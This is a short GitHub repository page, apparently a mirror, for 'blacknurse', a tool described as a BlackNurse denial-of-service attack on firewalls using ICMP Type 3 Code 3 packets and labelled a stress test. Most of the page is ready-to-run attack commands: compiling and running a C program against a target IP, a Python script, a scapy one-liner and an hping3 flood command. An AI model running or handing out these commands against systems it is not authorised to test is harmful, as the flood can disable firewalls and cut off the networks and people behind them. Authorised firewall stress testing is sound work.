hackingyseguridad / blacknurse

Test de Stress ICMP Type 3 Code 3 Blacknurse ( hackingyseguridad.com )

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

blacknurse

Black Nurse DOS Attack Firewall ( ICMP Type 3 Code 3 )

Ejecutar en c: gcc blacknurse.c -o blacknurse ./blacknurse IP

Ejecutar en Python: python blacknurse.py IP

Ejecutar con scapy: send(IP(dst="1.2.3.4")/ICMP(code=3,type=3))

Ejecutar con hping3 hping3 --icmp -C 3 -K 3 --flood IP

About

Test de Stress ICMP Type 3 Code 3 Blacknurse ( hackingyseguridad.com )


Languages

Language:C 79.1%Language:Python 20.9%